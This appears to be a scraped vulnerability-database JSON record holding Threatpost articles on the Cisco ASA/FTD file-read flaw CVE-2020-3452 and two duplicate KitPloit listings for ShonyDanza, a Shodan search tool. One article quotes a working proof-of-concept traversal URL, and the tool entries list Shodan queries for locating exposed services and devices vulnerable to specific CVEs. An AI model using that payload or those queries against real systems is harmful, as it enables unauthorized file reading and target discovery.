\n> \n> It\u2019s already being mass spammed across internet. \n> \n> As far as I can see people can only read LUA source files so far, so not terribly problematic as is. <https://t.co/kSIFQdz1go>\n> \n> \u2014 Kevin Beaumont (@GossiTheDog) [July 24, 2020](<https://twitter.com/GossiTheDog/status/1286614404054880256?ref_src=twsrc%5Etfw>)\n\nCisco said the vulnerability affects products if they are running a vulnerable release of Cisco ASA Software or Cisco FTD Software, with a vulnerable AnyConnect or WebVPN configuration: \u201cThe web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features,\u201d according to its advisory. However, \u201cthis vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/07/27115136/cisco-vulnerability-patch.png>)\n\nCredit: Rapid7\n\nResearchers with Rapid7 say that since the patch was issued, only about 10 percent of Cisco ASA/FTD devices detected as internet-facing have been rebooted \u2013 which is a \u201clikely indicator they\u2019ve been patched.\u201d Only 27 of the 398 detected in Fortune 500 companies appear to have been rebooted.\n\nResearchers encourage immediate patching of vulnerable ASA/FTD installations \u201cto prevent attackers from obtaining sensitive information from these devices which may be used in targeted attacks.\u201d\n\n\u201cCisco has provided fixes for all supported versions of ASA and FTD components,\u201d said researchers. \u201cCisco ASA Software releases 9.5 and earlier, as well as Release 9.7, along with Cisco FTD Release 6.2.2 have reached the end of software maintenance and organizations will have to upgrade to a later, supported version to fix this vulnerability.\u201d\n", 
"cvss3": {}, "published": "2020-07-27T16:23:16", "type": "threatpost", "title": "Attackers Exploiting High-Severity Network Security Flaw, Cisco Warns", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-3452"], "modified": "2020-07-27T16:23:16", "id": "THREATPOST:FB3A73274A678D5DA8D5263B9E1A1DA1", "href": "https://threatpost.com/attackers-exploiting-high-severity-network-security-flaw-cisco-warns/157756/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-10-15T22:16:17", "description": "A high-severity vulnerability in Cisco\u2019s network security software could lay bare sensitive data \u2013 such as WebVPN configurations and web cookies \u2013 to remote, unauthenticated attackers.\n\nThe flaw exists in the web services interface of Cisco\u2019s Firepower Threat Defense (FTD) software, which is part of its suite of network security and traffic management products; and its Adaptive Security Appliance (ASA) software, the operating system for its family of ASA corporate network security devices.\n\n\u201cAn attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device,\u201d according to a [Wednesday advisory from Cisco](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86>). 
\u201cA successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device.\u201d\n\nThe vulnerability ([CVE-2020-3452](<https://nvd.nist.gov/vuln/detail/CVE-2020-3452>)), which ranks 7.5 out of 10 on the CVSS scale, is due to a lack of proper input validation of URLs in HTTP requests processed by affected devices. Specifically, the vulnerability allows attackers to conduct directory traversal attacks, which is an HTTP attack enabling bad actors to access restricted directories and execute commands outside of the web server\u2019s root directory.\n\n\u201cThis vulnerability\u2026 is highly dangerous,\u201d said Mikhail Klyuchnikov of Positive Technologies, who was credited with independently reporting the flaw (along with Ahmed Aboul-Ela of RedForce), in a statement provided to Threatpost. \u201cThe cause is a failure to sufficiently verify inputs. An attacker can send a specially crafted HTTP request to gain access to the file system (RamFS), which stores data in RAM.\u201d\n\nA potential attacker can view files within the web services file system only. The web services file system is enabled for specific WebVPN and AnyConnect features (outlined in Cisco\u2019s advisory). The web services files that the attacker can view may have information such as WebVPN configuration, bookmarks, web cookies, partial web content and HTTP URLs.\n\nCisco said the vulnerability affects products if they are running a vulnerable release of Cisco ASA Software or Cisco FTD Software, with a vulnerable AnyConnect or WebVPN configuration: \u201cThe web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features,\u201d according to its advisory. 
However, \u201cthis vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.\u201d\n\nTo eliminate the vulnerability, Klyuchnikov urged Cisco users to update Cisco ASA to the most recent version. Cisco said it\u2019s not aware of any malicious exploits for the vulnerability \u2013 however, it is aware of proof-of-concept (POC) exploit code [released Wednesday](<https://twitter.com/aboul3la>) by security researcher Ahmed Aboul-Ela.\n\n> Here is POC of CVE-2020-3452, unauthenticated file read in Cisco ASA & Cisco Firepower.\n> \n> For example to read \"/+CSCOE+/portal_inc.lua\" file.\n> \n> https://<domain>/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../\n> \n> Happy Hacking! [pic.twitter.com/aBA3R7akkC](<https://t.co/aBA3R7akkC>)\n> \n> \u2014 Ahmed Aboul-Ela (@aboul3la) [July 22, 2020](<https://twitter.com/aboul3la/status/1286012324722155525?ref_src=twsrc%5Etfw>)\n\nEarlier in May, Cisco stomped out [12 high-severity vulnerabilities](<https://threatpost.com/cisco-fixes-high-severity-flaws-in-firepower-security-software-asa/155568/>) across its ASA and FTD network security products. 
The flaws could be exploited by unauthenticated remote attackers to launch an array of attacks \u2013 from denial of service (DoS) to sniffing out sensitive data.\n", "cvss3": {}, "published": "2020-07-23T19:49:49", "type": "threatpost", "title": "Cisco Network Security Flaw Leaks Sensitive Data", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-3452", "CVE-2020-5135"], "modified": "2020-07-23T19:49:49", "id": "THREATPOST:C51D2F2366676BB018956D93916AC33E", "href": "https://threatpost.com/network-security-cisco-flaw-leaks-sensitive-data/157691/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "kitploit": [{"lastseen": "2022-04-07T12:01:27", "description": "[](<https://3.bp.blogspot.com/-HfvtRTCYnTM/YZ3QJbhSs3I/AAAAAAAA4AU/kC3BBy581dgTiAKCIDOlmGtohgCXuQhlgCK4BGAYYCw/s1600/ShonyDanza_1_shonydanza_demo-780791.gif>)\n\n \n\n\nA customizable, easy-to-navigate tool for researching, pen testing, and defending with the power of Shodan.\n\n \n\n\nWith ShonyDanza, you can:\n\n * Obtain IPs based on search criteria\n * Automatically exclude honeypots from the results based on your pre-configured thresholds\n * Pre-configure all IP searches to filter on your specified net range(s)\n * Pre-configure search limits\n * Use build-a-search to craft searches with easy building blocks\n * Use stock searches and pre-configure your own stock searches\n * Check if IPs are known [malware](<https://www.kitploit.com/search/label/Malware> \"malware\" ) C2s\n * Get host and domain profiles\n * Scan on-demand\n * Find exploits\n * Get total counts for searches and exploits\n * Automatically save exploit code, IP lists, host profiles, domain profiles, and scan results to directories within ShonyDanza\n\n## Installation\n\n`git clone https://github.com/fierceoj/ShonyDanza.git` \n\n\n> Requirements\n\n * python3\n * shodan library\n\n`cd ShonyDanza` \n`pip3 install -r requirements.txt`\n\n## Usage\n\n> Edit config.py to include 
your desired configurations \n`cd configs` \n`sudo nano config.py` \n\n \n \n #config file for shonydanza searches \n \n #REQUIRED \n #maximum number of results that will be returned per search \n #default is 100 \n \n SEARCH_LIMIT = 100 \n \n \n #REQUIRED \n #IPs exceeding the honeyscore limit will not show up in IP results \n #scale is 0.0 to 1.0 \n #adjust to desired probability to restrict results by threshold, or keep at 1.0 to include all results \n \n HONEYSCORE_LIMIT = 1.0 \n \n \n #REQUIRED - at least one key: value pair \n #add a shodan dork to the dictionary below to add it to your shonydanza stock searches menu \n #see https://github.com/jakejarvis/awesome-shodan-queries for a great source of queries \n #check into \"vuln:\" filter if you have Small Business Plan or higher (e.g., vuln:cve-2019-11510) \n \n STOCK_SEARCHES = { \n 'ANONYMOUS_FTP':'ftp anonymous ok', \n 'RDP':'port:3389 has_screenshot:true', \n 'OPEN_TELNET':'port:23 console gateway -password', \n 'APACHE_DIR_LIST':'http.title:\"Index of / \"', \n 'SPRING_BOOT':'http.favicon.hash:116323821', \n 'HP_PRINTERS':'\"Serial Number:\" \"Built:\" \"Server: HP HTTP\"', \n 'DOCKER_API':'\"Docker Containers:\" port:2375', \n 'ANDROID_ROOT_BRIDGE':'\"Android Debug Bridge\" \"Device\" port:5555', \n 'MONGO_EXPRESS_GUI':'\"Set-Cookie: mongo-express=\" \"200 OK\"', \n 'CVE-2019-11510_PULSE_VPN':'http.html:/dana-na/', \n 'CVE-2019-19781_CITRIX_NETSCALER':'http.waf:\"Citrix NetScaler\"', \n 'CVE-2020-5902_F5_BIGIP':'http.favicon.hash:-335242539 \"3992\"', \n 'CVE-2020-3452_CISCO_ASA_FTD':'200 \"Set-Cookie: webvpn;\"' \n } \n \n \n #OPTIONAL \n #IP or cidr range constraint for searches that return list of IP addresses \n #use comma-separated list to designate multiple (e.g. 
1.1.1.1,2.2.0.0/16,3.3.3.3,3.3.3.4) \n \n #NET_RANGE = '0.0.0.0/0' \n \n\n> Run \n`cd ../` \n`python3 shonydanza.py` \n\n\nSee this [how-to article](<https://null-byte.wonderhowto.com/forum/to-use-shonydanza-find-target-and-exploit-0318883/> \"how-to article\" ) for additional usage instruction.\n\n## Legal Disclaimer\n\nThis project is made for educational and ethical [testing](<https://www.kitploit.com/search/label/Testing> \"testing\" ) purposes only. Usage of ShonyDanza for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.\n\n \n \n\n\n**[Download ShonyDanza](<https://github.com/fierceoj/ShonyDanza> \"Download ShonyDanza\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-01T20:30:00", "type": "kitploit", "title": "ShonyDanza - A Customizable, Easy-To-Navigate Tool For Researching, Pen Testing, And Defending With The Power Of Shodan", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-3452", "CVE-2020-5902"], "modified": "2021-12-01T20:30:00", "id": "KITPLOIT:4421457840699592233", "href": "http://www.kitploit.com/2021/12/shonydanza-customizable-easy-to.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-07T12:01:24", "description": "[](<https://blogger.googleusercontent.com/img/a/AVvXsEjG7AfpHcNjkzZMtvplE2bYVsPCgZ1wyo5jesct_CsGBPhciWCUWFhqC4SLSNboL7iPTWtI0RpGyHZQCbSylFXDC1py1fWqO3vCbpVdYDcHTRT2va2EUO1Vp9dPAgOP6FamNin8VZZdxS42vTbMMddcAUnuN5AAWWwfJDH2pfpmQhjA5RV51QbUk8BqJQ=s586>)\n\n \n\n\nA customizable, easy-to-navigate tool for researching, pen testing, and defending with the power of Shodan.\n\n \n\n\nWith ShonyDanza, you can:\n\n * Obtain IPs based on search criteria\n * Automatically exclude honeypots from the results based on your pre-configured thresholds\n * Pre-configure all IP searches to filter on your specified net range(s)\n * Pre-configure search limits\n * Use build-a-search to craft searches with easy building blocks\n * Use stock searches and pre-configure your own stock searches\n * Check if IPs are known [malware](<https://www.kitploit.com/search/label/Malware> \"malware\" ) C2s\n * Get host and domain profiles\n * Scan on-demand\n * Find exploits\n * Get total counts for searches and exploits\n * Automatically save exploit code, IP lists, host profiles, domain profiles, and scan results to directories within ShonyDanza\n\n## Installation\n\n`git clone https://github.com/fierceoj/ShonyDanza.git` \n\n\n> Requirements\n\n * python3\n * shodan library\n\n`cd ShonyDanza` \n`pip3 install -r requirements.txt`\n\n## Usage\n\n> Edit config.py to include 
your desired configurations \n`cd configs` \n`sudo nano config.py` \n\n \n \n #config file for shonydanza searches \n \n #REQUIRED \n #maximum number of results that will be returned per search \n #default is 100 \n \n SEARCH_LIMIT = 100 \n \n \n #REQUIRED \n #IPs exceeding the honeyscore limit will not show up in IP results \n #scale is 0.0 to 1.0 \n #adjust to desired probability to restrict results by threshold, or keep at 1.0 to include all results \n \n HONEYSCORE_LIMIT = 1.0 \n \n \n #REQUIRED - at least one key: value pair \n #add a shodan dork to the dictionary below to add it to your shonydanza stock searches menu \n #see https://github.com/jakejarvis/awesome-shodan-queries for a great source of queries \n #check into \"vuln:\" filter if you have Small Business Plan or higher (e.g., vuln:cve-2019-11510) \n \n STOCK_SEARCHES = { \n 'ANONYMOUS_FTP':'ftp anonymous ok', \n 'RDP':'port:3389 has_screenshot:true', \n 'OPEN_TELNET':'port:23 console gateway -password', \n 'APACHE_DIR_LIST':'http.title:\"Index of /\"', \n 'SPRING_BOOT':'http.favicon.hash:116323821', \n 'HP_PRINTERS':'\"Serial Number:\" \"Built:\" \"Server: HP HTTP\"', \n 'DOCKER_API':'\"Docker Containers:\" port:2375', \n 'ANDROID_ROOT_BRIDGE':'\"Android Debug Bridge\" \"Device\" port:5555', \n 'MONGO_EXPRESS_GUI':'\"Set-Cookie: mongo-express=\" \"200 OK\"', \n 'CVE-2019-11510_PULSE_VPN':'http.html:/dana-na/', \n 'CVE-2019-19781_CITRIX_NETSCALER':'http.waf:\"Citrix NetScaler\"', \n 'CVE-2020-5902_F5_BIGIP':'http.favicon.hash:-335242539 \"3992\"', \n 'CVE-2020-3452_CISCO_ASA_FTD':'200 \"Set-Cookie: webvpn;\"' \n } \n \n \n #OPTIONAL \n #IP or cidr range constraint for searches that return list of IP addresses \n #use comma-separated list to designate multiple (e.g. 
1.1.1.1,2.2.0.0/16,3.3.3.3,3.3.3.4) \n \n #NET_RANGE = '0.0.0.0/0' \n \n\n> Run \n`cd ../` \n`python3 shonydanza.py` \n\n\nSee this [how-to article](<https://null-byte.wonderhowto.com/forum/to-use-shonydanza-find-target-and-exploit-0318883/> \"how-to article\" ) for additional usage instruction.\n\n## Legal Disclaimer\n\nThis project is made for educational and ethical testing purposes only. Usage of ShonyDanza for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.\n\n \n \n\n\n**[Download ShonyDanza](<https://github.com/fierceoj/ShonyDanza> \"Download ShonyDanza\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-27T20:30:00", "type": "kitploit", "title": "ShonyDanza - A Customizable, Easy-To-Navigate Tool For Researching, Pen Testing, And Defending With The Power Of Shodan", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-3452", "CVE-2020-5902"], "modified": "2021-12-27T20:30:00", "id": "KITPLOIT:4707889613618662864", "href": "http://www.kitploit.com/2021/12/shonydanza-customizable-easy-to_01477721372.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}